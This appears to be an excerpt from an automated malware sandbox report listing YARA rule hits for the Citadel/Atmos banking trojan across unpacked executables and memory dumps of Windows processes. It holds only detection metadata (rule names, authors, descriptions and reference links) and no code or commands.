Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 21.0.RuntimeBroker.exe.190000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 36.0.XRdxSzSUL8yOL.exe.2ca0000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 32.0.XRdxSzSUL8yOL.exe.2530000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 9.0.RuntimeBroker.exe.110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 1.2.nyheukpo.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.0.RuntimeBroker.exe.ee0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0.3.services.png.exe.2590000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPE	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000000.00000003.1693418014.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000000.00000003.1699808293.00000000021C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
Source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
